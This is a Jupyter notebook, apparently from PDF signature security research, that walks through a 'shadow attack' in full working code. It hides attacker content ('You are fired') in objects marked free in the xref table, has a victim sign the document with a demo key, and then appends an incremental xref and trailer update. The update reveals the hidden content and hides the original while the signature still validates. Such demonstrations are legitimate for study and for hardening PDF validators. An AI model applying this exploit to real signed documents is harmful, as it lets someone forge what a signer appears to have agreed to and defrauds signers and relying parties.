# Step 0: Configuration Parameters

In [None]:
# Names of the PDF files produced by the steps of this notebook.
# The shadowed document is created directly (there is no separate
# un-shadowed original on disk) for reasons of simplicity.
filename_unsigned = "2_original-document-shadowed.pdf"
filename_signed = "3_original-document-shadowed-signed.pdf"
filename_manipulated = "4_original-document-shadowed-signed-manipulated.pdf"

# Values of the two form fields: the content that is in use when the
# document is signed, and the shadow content the attackers enable later.
original_text = "1000 USD"
attacker_text = "You are fired"


# Step 1: Inserting the shadow content

The attackers insert the malicious content, which is correctly referenced but marked in the xref table as *not in use*.

In [None]:
from reportlab.pdfgen import canvas
from reportlab.pdfbase import pdfform
from reportlab.lib.colors import black, white
from reportlab.pdfbase.acroform import AcroForm

# getObjectByNeedle comes from the project-local pdfmanipulation module.
# It is imported here so that this cell also works when the notebook is
# executed top to bottom (the only other import is in a later cell).
import sys

_lib_dir = '../../../resources/lib/'
if _lib_dir not in sys.path:
    sys.path.append(_lib_dir)
from pdfmanipulation import getObjectByNeedle

# Create the document. Page compression is switched off; presumably so the
# resulting file can be searched and patched as plain bytes below.
c = canvas.Canvas(
    filename=filename_unsigned,
    pageCompression=False
)
form = AcroForm(c)
# Example based on:
# https://www.blog.pythonlibrary.org/2018/05/29/creating-interactive-pdf-forms-in-reportlab-with-python/
c.drawCentredString(220, 700, 'Your Reward:')
# Two borderless text fields: the original content and, 30 units below it,
# the attacker's shadow content.
form.textfield(name='original_text', y=660, value=original_text, x=220, width=300, height=20, textColor=black, borderColor=white, borderWidth=0, forceBorder=False)
form.textfield(name='attacker_text', y=630, value=attacker_text, x=220, width=300, height=20, textColor=black, borderColor=white, borderWidth=0, forceBorder=False)
c.save()

# We now need to set the attacker objects to "free" in the xref table.
with open(filename_unsigned, "rb") as fp:
    pdf = bytearray(fp.read())

# Locate every object that contains the attacker text. Each match is used
# as a regex match object exposing the named groups "objnr" and "gennr".
attacker_objects = getObjectByNeedle(pdf, attacker_text)
for match in attacker_objects:
    gennr = int(match.group("gennr").decode())
    offset = match.start()
    # The xref entry of the object is "<10-digit offset> <5-digit gen> n";
    # flipping the trailing "n" (in use) to "f" (free) hides the object.
    needle = f"{offset:010} {gennr:05} n".encode()
    replace = f"{offset:010} {gennr:05} f".encode()
    # Plain byte replacement: the needle is a literal, no regex is needed.
    pdf = pdf.replace(needle, replace)

# Write the patched file back in place.
with open(filename_unsigned, "wb") as fp:
    fp.write(pdf)
print(f"Successfully created {filename_unsigned}")

# Step 2: The Victim signs the document
Here we simulate a victim who signs the document.

In [None]:
import datetime
from cryptography.hazmat import backends
from cryptography.hazmat.primitives.serialization import pkcs12
from endesive.pdf import cms
# Signing time: 12 hours before the current UTC time, formatted as a PDF
# date string with an explicit +00'00' offset.
# A timezone-aware "now" replaces the deprecated datetime.utcnow(); the
# formatted result is the same.
date = datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(hours=12)
date = date.strftime("D:%Y%m%d%H%M%S+00'00'")

# Signature options handed to endesive's cms.sign().
# NOTE(review): the meaning of the individual keys is defined by endesive;
# confirm against its documentation before changing any of them.
dct = {
    "aligned": 0,
    "sigflagsft": 132,
    "sigpage": 0,
    "sigbutton": True,
    "sigfield": "Signature1",
    "sigandcertify": False,
    "signaturebox": (350, 350, 520, 300),
    "signature": "(Signed) I ultimatively agree",
    "contact": "Signer",
    "location": "AoE",
    "signingdate": date,
    "reason": "No reason given",
    "password": "1234",
}

# Load the demo signing key and certificates from the PKCS#12 container.
with open("../../../resources/pdf-signer/demo-rsa2048.p12", "rb") as fp:
    p12 = pkcs12.load_key_and_certificates(
        fp.read(), b"demo-rsa2048", backends.default_backend()
    )
# load_key_and_certificates returns (private key, certificate, extra certs).
private_key, certificate, additional_certs = p12

# Read the unsigned document, closing the file handle afterwards.
with open(filename_unsigned, "rb") as fp:
    data_unsigned = fp.read()

data_signature = cms.sign(
    data_unsigned, dct, private_key, certificate, additional_certs, "sha256"
)

# The signed file is the unsigned bytes followed by the bytes returned
# by cms.sign().
with open(filename_signed, "wb") as fp:
    fp.write(data_unsigned)
    fp.write(data_signature)
print(f"Successfully created {filename_signed}")


# Step 3: Making shadow content visible

The attackers append a new Xref table. The new Xref table enables the hidden content and disables the original one.

In [None]:
import sys
sys.path.append('../../../resources/lib/')
from pdfmanipulation import *
# Read the signed document, closing the file handle afterwards.
with open(filename_signed, "rb") as fp:
    data_signed = bytearray(fp.read())

# Locate the objects holding the attacker text and the original text.
# Each match is used as a regex match object exposing the named groups
# "objnr" and "gennr"; only the first two matches of the original text
# are taken.
attacker_objects = getObjectByNeedle(data_signed, attacker_text)
original_objects = getObjectByNeedle(data_signed, original_text)[:2]

# The appended xref section starts one byte after the signed data, because
# xref_update below begins with a newline before the "xref" keyword.
xref_offset = len(data_signed) + 1


def _xref_entries(matches, in_use):
    """Return one single-entry xref subsection per match, as bytes.

    Each subsection is "<objnr> 1 " followed by an entry made of the
    10-digit byte offset of the match, its 5-digit generation number and
    the flag "n" (in use) or "f" (free), depending on ``in_use``.
    """
    flag = "n" if in_use else "f"
    chunks = []
    for match in matches:
        gennr = int(match.group("gennr").decode())
        chunks.append(match.group("objnr") + b" 1 \n")
        chunks.append(f"{match.start():010} {gennr:05} {flag} \n".encode())
    return b"".join(chunks)


# Now we create a simple xref update. The header is spelled out line by
# line because the trailing spaces are significant and easy to lose inside
# a multi-line literal.
xref_update = (
    b"\n"
    b"xref\n"
    b"0 1 \n"
    b"0000000000 65535 f \n"
)
# Disable the original content and enable the hidden attacker content.
xref_update += _xref_entries(original_objects, in_use=False)
xref_update += _xref_entries(attacker_objects, in_use=True)

# Now we create a simple trailer update.
# Most values are simply copied from the previous trailer (which is the
# signed trailer); /Prev points at the previous xref section.
previous_trailer = getTrailer(data_signed)[-1]
previous_startxref = getStartxref(data_signed)[-1].group("value").decode()
trailer_update = f"""
trailer
<<
/Size {previous_trailer.group("size").decode()}
/Root {previous_trailer.group("root").decode()}
/Info {previous_trailer.group("info").decode()}
/ID {previous_trailer.group("id").decode()}
/Prev {previous_startxref}
>>
startxref
{xref_offset}
%%EOF
""".encode()

# Finally, we write the manipulated file: the signed bytes are left
# untouched and the update is only appended after them.
# The signature remains valid, but the attacker content is shown.
with open(filename_manipulated, "wb") as fp:
    fp.write(data_signed)
    fp.write(xref_update)
    fp.write(trailer_update)

print(f"Successfully created {filename_manipulated}")